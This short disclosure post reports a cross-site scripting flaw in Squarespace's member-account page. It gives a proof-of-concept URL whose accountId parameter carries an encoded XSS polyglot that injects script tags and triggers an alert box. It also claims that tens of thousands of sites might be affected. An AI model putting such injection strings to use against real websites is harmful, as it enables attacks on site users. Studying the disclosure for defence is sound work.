The Grey Hat hacker "Sony" come with some interesting xss find. One of the popular and and best blogging/Content Management web application Sqaurespace vulnerable to XSS Attack.
Poc:
http://sonystyles.squarespace.com/display/configuration/CreateOrModifyMemberAccount?accountId=2095672%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
The xss attack can be viewed after member login. Squarespace powers tens of thousands of websites with billions of monthly hits; all of them might be vulnerable to this attack.
About Squarespace:
a web publishing (blogging/content management)company that sells a software publishing platform and file server service to individuals and businesses, providing them the tools and assistance to create and maintain well-designed websites.
source:
http://st2tea.blogspot.com/2012/02/squarespace-cross-site-scripting.html
